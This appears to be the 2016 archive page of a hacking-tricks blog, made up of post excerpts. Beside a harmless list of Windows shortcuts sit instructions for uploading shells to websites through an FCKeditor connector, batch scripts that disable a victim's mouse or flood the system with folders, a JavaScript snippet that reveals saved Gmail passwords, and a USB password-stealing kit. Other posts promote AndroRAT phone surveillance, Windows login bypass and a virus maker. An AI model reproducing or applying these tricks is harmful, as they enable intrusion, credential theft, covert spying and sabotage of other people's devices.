
Showing posts from 2016

Best WhatsApp Unknow Tricks!

Whatsapp is easily the most popular mobile messaging platform till date. But are you aware a few of the secrets methods of WhatsApp which could get you one stage further? Here, I have compiled a list of few really cool WhatsApp tricks which will keep you one step ahead from your colleagues and friends. I hope you will like it.  1- Change Your FRIEND'S PROFILE PICTURE TO A MONKEY! Sure, you can't make such non-sense show up on everyone's phone, but here's a small trick to change your friend's WhatsApp profile picture to a MONKEY! (or whatever you want to) Follow the given steps: 1. You need the image you want to replace your friend's profile picture with. You can use this cute little monkey. In case you want to use something else, you can, but the image should be square (541x541 pixels preferred) 2. Go to contacts and copy your friend's number. 3. Rename the image as your friend's number, removing the "+". (F...

Windows keyboard shortcuts

Use shortcut keys as an alternative to the mouse when working in Windows. You can open, close, and navigate the Start menu, desktop, menus, dialog boxes, and Web pages using keyboard shortcuts. Keyboard shortcuts may also make it easier for you to interact with your computer. Click a heading, or press TAB to highlight a heading, and then press ENTER. General keyboard shortcuts Press To CTRL+C Copy. CTRL+X Cut. CTRL+V Paste. CTRL+Z Undo. DELETE Delete. SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin. CTRL while dragging an item Copy selected item. CTRL+SHIFT while dragging an item Create shortcut to selected item. F2 Rename selected item. CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word. CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word. CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragr...

Website Hacking Using The OpenCart Vulnerability

Hey guys,today after many day i am going to share some information on website hacking.I have performed this hack as a test locally on my website and it was 100% successful.All you need to do is to perform the below steps properly and inject your shells in the website which will do work for yours. Steps for hacking website using OpenCart Vulnerability: Open Google and search this dork " Index of /fckeditor/editor/filemanager/connectors/ " in google search,a new page will load showing the result which will contain list many website.Select anyone website you want. Open the select website which you want to hack.You will find a folder name " connector ".Open that folder(if connector folder is not there,don't panic,stay calm and open the " test.html" file).Once you have open the connector folder,you will find a file with name " test.html ",open that file. At top left corner you will find " connector,current folder and ...

Mouse virus

Have you every thought to disable or delete mouse pointer from your windows OS while still the mouse is connected to your computer and the mouse light glows? The below trick help us to do this task.The code give below when run,it just delete the mouse files from the windows registrey. Any driver or software we install on our computer are registered in windows regedit. If the registry file of a particular software or driver is deleted,then that software or driver wont work. There are to ways to do this task.The first way is to manually delete the registry file of mouse and the second way is to make a program which will directly do this job for you. Here's the code: rem --------------------------------- rem Disable Mouse set  key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- Save the above code as "anyname.bat" Note: Save with...

AndroRAT(Made Easy)

AndroRat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. The name AndroRat is a mix of Android and RAT (Remote Access Tool). The goal of the application is to give the control of the android system remotely and retrieve information from it. THE AVAILABLE  FUNCTION ARE: Get contacts (and all theirs informations) Get call logs Get all messages Location by GPS/Network Monitoring received messages in live Monitoring phone state in live (call received, call sent, call missed..) Take a picture from the camera Stream sound from microphone (or other sources..) Streaming video (for activity based client only) Do a toast Send a text message Give call Open an URL in the default browser Do vibrate the phone NOTE: ABOVE INFORMATION AND APPLICATION IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM...


Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. The name Androrat is a mix of Android and RAT (Remote Access Tool). It has been developed in a team of 4 for a university project. It has been realised in one month. The goal of the application is to give the control of the android system remotely and retrieve information from it. Technical matters: The android application is the client for the server which receive all the connections. The android application run as a service(not an activity) that is started during the boot. So the user does not need to interact with the service (Even though there is a debug activity that allow to configure the IP and the port to connect to). The connection to the server can be triggered by a SMS or a call (this can be configured) All the available  functionalities are: Get contacts (and all theirs informations) Get call logs Get all messages Locati...

Hack GMAIL password.

Have you ever wondered that you can actually see that hidden password in any computer? Yes it is possible by performing a simple task.You just need to perform 3 steps and BINGO,you can see the password. When you logged to your friend’s computer haven’t you seen a gmail login screen like this?  To keep things simple, i explained the process step by step below. Go to the gmail login page.If the form is already filled by email and password of your friends,then you can easy see that password by inserting a simple javascript code into your address bar. Now copy and paste the  javascript code given below into the address bar of you browser as it is.Remember, you should paste this into the address bar of the already opened gmail tab and remove the double quotes before the javascript. " javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].docu...

Get Facebook Followers For Free.

Now days everyone wants as much as follower to their  facebook id and get popular.Well this can be done easily. Just follow the steps given below" Share this post with as many people as you can. Visit this link FacebookFollowerBug. A new page will open in new tab. In that page you will find ""First Get Your Facebook ID". Click on it,a popup will open,enter your facebook username or profile url. Then click on "Get Facebook ID". A new popup will open which will contain your facebook id and username details,dnt worry about your privacy,it has nothing to do with this trick. Copy you facebook id and close the popup,then refresh the page. Now enter your facebook id and Click on "Get Followers!!"Voila,within 3 seconds,you will start getting notification that some people are following you. NOTE: Just make sure that you do not refresh the page for 8 to 10 mins as the script will be running. You all might think whether this really...

Hack Windows Admin password.

Requirements: BackTrack Linux 4 or 5. Download it from here.   One pen drive(above 4gb) Xp Free Fast RainBow table []. Download it from here. *Install the Backtrack Linux in the pen drive with small amount of persistent memory. Follow the below steps to hack windows admin password. Step 1: Booting From Back Track Insert the pen drive in target computer[when turned off]. We are going to boot the operating system from pen drive, so insert when the system is turned off. Now Turn on the system. Press F10 [boot menu, differs for system] before booting and select boot from Pen drive. Now it will boot the Backtrack. Select "Graphical User Interface " Now wait for a while ( it will execute some commands} Now you can see the "root:" type "startx" and hit enter. It will bring you to the GUI view of Backtrack. Step 2:Copy the SAM and System files Click the Start button(dragon symbol) Select System Menu Select Storage Media(if ...

Folder Mess Trick

In this post,i am going to show you some codes,which will create folders some limited on its own and open it automatically. Well,this can be quiet irritating for your victim as when ever this code is executed on your victim computer,it will make limited number of folders but will open them continuously which will result in slowing down the system or even sometimes the system will crash. Copy paste the below code in notepad and save it with "anyname .bat ". @echo off :RON md CYBERTECH1  md CYBERTECH2 md CYBERTECH3 md CYBERTECH4 md CYBERTECH5 md CYBERTECH6 md CYBERTECH7 md CYBERTECH8 md CYBERTECH9 md CYBERTECH10 md CYBERTECH11 md CYBERTECH12 md CYBERTECH13 md CYBERTECH14 md CYBERTECH15 start CYBERTECH1 start CYBERTECH2 start CYBERTECH3 start CYBERTECH4 start CYBERTECH5 start CYBERTECH6 start CYBERTECH7 start CYBERTECH8 start CYBERTECH9 start CYBERTECH10 start CYBERTECH11 start CYBERTECH12 start CYBERTECH13 ...

Deadly Virus Maker.

What is Computer Virus? A computer virus is a stealth program  that is injected into your computer without your knowledge and runs against your wishes and frustrate you some time. Viruses can also replicate themselves. All  computer  viruses are man-made.A virus can  replicates itself by being copied or initiating its copying to another program, computer boot sector or files,etc.Some viruses are also used to get useful information of users like credit card details,email-id passwords,etc. In this post i am sharing "Deadlines Virus Maker" with you all.This software will help you out to make some computer viruses easily. Features Deadlines Virus Maker: Show message box at Windows Start-up. Can be added to Start-up. Close Widows Live Messenger. Close Skype. Close Yahoo Messenger. Random things happens to computer. Infinite Beeping. Infinite Message Boxes. Disconnect from the Internet. Disable Firewall. Disable Browser(Ch...


Kon-Boot is a only application which will silently bypass all the Admin/User login authentications of Windows based operating system without changing the default password .This is the only tool which will help you to login in any windows based operating system of which you are not knowing the password .It is easy to use and very fast application . Kon-Boot is mainly created for Ubuntu ,but now it supports more Linux distributions . Kon-Boot can also crack an array of Windows and Linux operating system ranging from Windows XP to Windows 8.1,which makes it one of the first tools to break Windows 7 passwords .On the Linux from it supports Gentoo , Ubuntu , Debian and Fedora flavors . By using this application you can bypass login authentication of the above mentioned operation system. Download the Kon-Boot from the download button given below . Steps for using Kon-Boot: Download the Kon-Boot from download button  given below. Open the Kon-Boot fo...

Hack Password Using Pen Drive.

Today I will show you how to retrieve/hack passwords using USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and a USB Pendrive you can create your own rootkit to retrieve/hack passwords from your friend's/college Computer. You will need the following tools to create your rootkit. Click on their name to download them. MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger,Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView : Recovers the passw...

Hack Username And Password Using Kali Linux.

      Hack Email-id,Username and password or any user details by using Kali Linux . Today,i am going to show you how you can get email-id,username and password or any user details you want by using KALI LINUX . Steps for setting up your system. Download Kali Linux from here. Extract the contents of Kali Linux iso file which you  downloaded in step and copy it to pendrive or instead of pendrive burn the iso file in cd if you want to make a cd of it. After copying all contents to pendrive or burning the iso file in cd,reboot you system,press F8 on boot-time and select boot from pendrive if you have copied all the files in pendrive,else boot from cd-rom if you burn the iso file in cd. After selecting the boot from device,the kali installation window will open,install accordingly as per your requirement. NOTE:During installation,in mount point of selected installation drive,set mount point to "/" . Remember the username and pass...